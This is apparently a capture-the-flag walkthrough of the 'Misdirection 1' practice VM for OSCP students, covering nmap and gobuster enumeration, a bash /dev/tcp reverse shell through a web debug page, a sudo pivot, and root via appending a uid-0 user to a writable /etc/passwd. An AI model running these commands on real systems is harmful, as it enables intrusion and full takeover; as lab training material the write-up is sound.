I"d:<p>This is misdirection 1 created by <strong>FalconSpy</strong>, the purpose of this machine is to grant OSCP students further develop, strengthen, and practice their methodology for the exam.</p>

<h2 id="information-gathering">Information Gathering</h2>
<h3 id="host-discovery">Host Discovery</h3>
<p>We enumerate the local network to find the target machine.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~/misdirection<span class="nv">$ </span>nmap <span class="nt">-sn</span> <span class="nt">-n</span> 192.168.179.1/24
Starting Nmap 7.91 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2021-07-13 19:32 <span class="nt">-05</span>
Nmap scan report <span class="k">for </span>192.168.179.141
Host is up <span class="o">(</span>0.00078s latency<span class="o">)</span><span class="nb">.</span>
MAC Address: 00:0C:29:10:9B:9B <span class="o">(</span>VMware<span class="o">)</span>
Nmap scan report <span class="k">for </span>192.168.179.254
Host is up <span class="o">(</span>0.00017s latency<span class="o">)</span><span class="nb">.</span>
MAC Address: 00:50:56:E9:4A:73 <span class="o">(</span>VMware<span class="o">)</span>
Nmap scan report <span class="k">for </span>192.168.179.1
Host is up.
</code></pre></div></div>

<h3 id="port-scanning">Port Scanning</h3>
<p>Located the target, I proceed to perform a TCP port scan for all ports with nmap.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~/misdirection<span class="nv">$ </span>nmap <span class="nt">-T4</span> <span class="nt">-p1-65535</span> <span class="nt">-vv</span> <span class="nt">-n</span> 192.168.179.141 <span class="nt">-oG</span> tcp-all-ports.txt
...
PORT     STATE SERVICE    REASON
22/tcp   open  ssh        syn-ack ttl 64
80/tcp   open  http       syn-ack ttl 64
3306/tcp open  mysql      syn-ack ttl 64
8080/tcp open  http-proxy syn-ack ttl 64
MAC Address: 00:0C:29:10:9B:9B <span class="o">(</span>VMware<span class="o">)</span>
...
</code></pre></div></div>

<h3 id="service-enumeration">Service Enumeration</h3>
<p>Then I do the service enumeration to the open TCP ports.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~/misdirection<span class="nv">$ </span>nmap <span class="nt">-sV</span> <span class="nt">-sC</span> <span class="nt">-p22</span>,80,3306,8080 <span class="nt">-vv</span> <span class="nt">-n</span> 192.168.179.141 <span class="nt">-oN</span> service-enum.txt
...
PORT     STATE SERVICE REASON         VERSION                                                                                                                      
22/tcp   open  ssh     syn-ack ttl 64 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span>                                                                 
| ssh-hostkey:                                                                                                                                                     
|   2048 ec:bb:44:ee:f3:33:af:9f:a5:ce:b5:77:61:45:e4:36 <span class="o">(</span>RSA<span class="o">)</span>                                                                                                     
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCkS5yl+Dpb7vsMGbzAHXBYrVSUNTh4kYGh8zajM3ZujG0XHLvgkW7xJ6F/meai9IrCB5gTq7+tTsn+fqNk0cAZugz4h+vwm5ekXe5szPPHNxNUlKuNAQ0Rch9k7
jT/2pWjtsE5iF6yFlh1UA2vBKqrTWVU5vrGWswdFRMWICKWiFXwl1Tv93STPsKHYoVbq74v2y1mVOLn+3JNMmRNCBFqh8Z2x+1DTep0YY8vIV325iRK5ROKCJAPeyX33uoxQ/cYrdPIS+Whs9QX0C+W343Hf2Ypq93h
3/g3NNm54LvZdE6X2vTUcUHGdvK2gU+dWQOiDhCpMDv3wiEAwGlf87P5                                                                                                           
|   256 67:7b:cb:4e:95:1b:78:08:8d:2a:b1:47:04:8d:62:87 <span class="o">(</span>ECDSA<span class="o">)</span>                                                                                                    
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBM+YEivOAqHPDlFWduSuOjAjuJtfC9v/KW2uYB85gxQuibGJQZhFPcxwPEUf7UvQ/a5fr/keKYF2Kdld6gO44jY<span class="o">=</span> 
|   256 59:04:1d:25:11:6d:89:a3:6c:6d:e4:e3:d2:3c:da:7d <span class="o">(</span>ED25519<span class="o">)</span>
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFHxbfiqinvu3cV7JoKrOF3w64zk+0N0h+/2nu+Z20Mk
80/tcp   open  http    syn-ack ttl 64 Rocket httpd 1.2.6 <span class="o">(</span>Python 2.7.15rc1<span class="o">)</span>
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Rocket 1.2.6 Python/2.7.15rc1
|_http-title: 502 Proxy Error
3306/tcp open  mysql   syn-ack ttl 64 MySQL <span class="o">(</span>unauthorized<span class="o">)</span>
|_ssl-cert: ERROR: Script execution failed <span class="o">(</span>use <span class="nt">-d</span> to debug<span class="o">)</span>
|_ssl-date: ERROR: Script execution failed <span class="o">(</span>use <span class="nt">-d</span> to debug<span class="o">)</span>
|_sslv2: ERROR: Script execution failed <span class="o">(</span>use <span class="nt">-d</span> to debug<span class="o">)</span>
|_tls-alpn: ERROR: Script execution failed <span class="o">(</span>use <span class="nt">-d</span> to debug<span class="o">)</span>
|_tls-nextprotoneg: ERROR: Script execution failed <span class="o">(</span>use <span class="nt">-d</span> to debug<span class="o">)</span>
8080/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.29 <span class="o">((</span>Ubuntu<span class="o">))</span>
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.29 <span class="o">(</span>Ubuntu<span class="o">)</span>
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 00:0C:29:10:9B:9B <span class="o">(</span>VMware<span class="o">)</span>
...
</code></pre></div></div>

<h3 id="web-enumeration">Web Enumeration</h3>
<p>Poked around the web service on port 80 I didn’t found nothing interesting.</p>

<p><img src="/assets/images/misdirection/screenshot-1.png" alt="" /></p>

<p>So I’m heading to enumerate the web page on port 8080, but at a  glance I can’t find anything, so I run gobuster to find hidden web directories and files.</p>

<p><img src="/assets/images/misdirection/screenshot-2.png" alt="" /></p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~/misdirection<span class="nv">$ </span>gobuster <span class="nb">dir</span> <span class="nt">-u</span> http://192.168.179.141:8080 <span class="nt">-w</span> /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt <span class="nt">-x</span> php,html,txt,sql <span class="nt">-e</span>
...
http://192.168.179.141:8080/index.html           <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 10918]
http://192.168.179.141:8080/images               <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 326] <span class="o">[</span><span class="nt">--</span><span class="o">&gt;</span> http://192.168.179.141:8080/images/]
http://192.168.179.141:8080/help                 <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 324] <span class="o">[</span><span class="nt">--</span><span class="o">&gt;</span> http://192.168.179.141:8080/help/]  
http://192.168.179.141:8080/scripts              <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 327] <span class="o">[</span><span class="nt">--</span><span class="o">&gt;</span> http://192.168.179.141:8080/scripts/]
http://192.168.179.141:8080/css                  <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 323] <span class="o">[</span><span class="nt">--</span><span class="o">&gt;</span> http://192.168.179.141:8080/css/]    
http://192.168.179.141:8080/wordpress            <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 329] <span class="o">[</span><span class="nt">--</span><span class="o">&gt;</span> http://192.168.179.141:8080/wordpress/]
http://192.168.179.141:8080/development          <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 331] <span class="o">[</span><span class="nt">--</span><span class="o">&gt;</span> http://192.168.179.141:8080/development/]
http://192.168.179.141:8080/manual               <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 326] <span class="o">[</span><span class="nt">--</span><span class="o">&gt;</span> http://192.168.179.141:8080/manual/]     
http://192.168.179.141:8080/js                   <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 322] <span class="o">[</span><span class="nt">--</span><span class="o">&gt;</span> http://192.168.179.141:8080/js/]         
http://192.168.179.141:8080/shell                <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 325] <span class="o">[</span><span class="nt">--</span><span class="o">&gt;</span> http://192.168.179.141:8080/shell/]      
http://192.168.179.141:8080/debug                <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 325] <span class="o">[</span><span class="nt">--</span><span class="o">&gt;</span> http://192.168.179.141:8080/debug/]
...
</code></pre></div></div>

<p>Checking the <strong>debug</strong> directorie I find a script that allows run system commands.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>http://192.168.179.141:8080/debug/
</code></pre></div></div>
<p><img src="/assets/images/misdirection/screenshot-3.png" alt="" /></p>

<h2 id="exploitation">Exploitation</h2>
<h3 id="command-injection">Command Injection</h3>
<p><strong>Getting a reverse shell</strong></p>

<p>Then we first set up a netcat listener and execute the the following instruction:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bash <span class="nt">-c</span> <span class="s2">"/bin/bash -i &gt;&amp; /dev/tcp/192.168.179.1/443 0&gt;&amp;1"</span>
</code></pre></div></div>
<p><img src="/assets/images/misdirection/screenshot-4.png" alt="" /></p>

<p>And we get a reverse shell, after enumerating the sudo permissions I see that the bash command is possible execute it without password as the brexit user.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~/misdirection<span class="nv">$ </span>nc <span class="nt">-vlnp</span> 443
listening on <span class="o">[</span>any] 443 ...
connect to <span class="o">[</span>192.168.179.1] from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>192.168.179.141] 34318
bash: cannot <span class="nb">set </span>terminal process group <span class="o">(</span>1047<span class="o">)</span>: Inappropriate ioctl <span class="k">for </span>device
bash: no job control <span class="k">in </span>this shell
www-data@misdirection:/var/www/html/debug<span class="nv">$ </span><span class="nb">id
</span><span class="nv">uid</span><span class="o">=</span>33<span class="o">(</span>www-data<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>33<span class="o">(</span>www-data<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>33<span class="o">(</span>www-data<span class="o">)</span>
www-data@misdirection:/var/www/html/debug<span class="nv">$ </span><span class="nb">sudo</span> <span class="nt">-l</span>
Matching Defaults entries <span class="k">for </span>www-data on localhost:
    env_reset, mail_badpass,
    <span class="nv">secure_path</span><span class="o">=</span>/usr/local/sbin<span class="se">\:</span>/usr/local/bin<span class="se">\:</span>/usr/sbin<span class="se">\:</span>/usr/bin<span class="se">\:</span>/sbin<span class="se">\:</span>/bin<span class="se">\:</span>/snap/bin

User www-data may run the following commands on localhost:
    <span class="o">(</span>brexit<span class="o">)</span> NOPASSWD: /bin/bash
</code></pre></div></div>
<p>After to execute the bash command as the brexit user, we get a bash session and spawn a TTY shell.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>www-data@misdirection:/var/www/html/debug<span class="nv">$ </span><span class="nb">sudo</span> <span class="nt">-u</span> brexit /bin/bash
python <span class="nt">-c</span> <span class="s1">'import pty;pty.spawn("/bin/bash")'</span>
brexit@misdirection:~<span class="nv">$ </span><span class="nb">uname</span> <span class="nt">-a</span>
Linux misdirection 4.15.0-50-generic <span class="c">#54-Ubuntu SMP Mon May 6 18:46:08 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux</span>
</code></pre></div></div>

<h2 id="privilege-escalation">Privilege Escalation</h2>
<h3 id="writable-etcpasswd-file">Writable /etc/passwd File</h3>
<p>Enumerating the system I managed to identify that the <strong>passwd</strong> file has write permissions for the brexit user.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>brexit@misdirection:/tmp<span class="nv">$ </span><span class="nb">ls</span> <span class="nt">-la</span> /etc/passwd
<span class="nt">-rwxrwxr--</span> 1 root brexit 1617 Jun  1  2019 /etc/passwd
</code></pre></div></div>
<p>In our attacking machine we generate a password hash with openssl.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~/misdirection<span class="nv">$ </span>openssl passwd <span class="nt">-1</span> get.r00t
<span class="nv">$1$7Stc2cvP$1EtnNyONHtdDuHw2C9rNb1</span>
</code></pre></div></div>
<p>Then we redirect our s4rgas user with the uid and gid set to 0 to the <strong>passwd</strong> file, and we switch to the new user with root privileges.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>brexit@misdirection:/tmp<span class="nv">$ </span><span class="nb">echo</span> <span class="s1">'s4rgaz:$1$7Stc2cvP$1EtnNyONHtdDuHw2C9rNb1:0:0:root:/root:/bin/bash'</span> <span class="o">&gt;&gt;</span> /etc/passwd
brexit@misdirection:/tmp<span class="nv">$ </span>su s4rgaz
Password: 
root@misdirection:/tmp# <span class="nb">id
</span><span class="nv">uid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span>
</code></pre></div></div>
:ET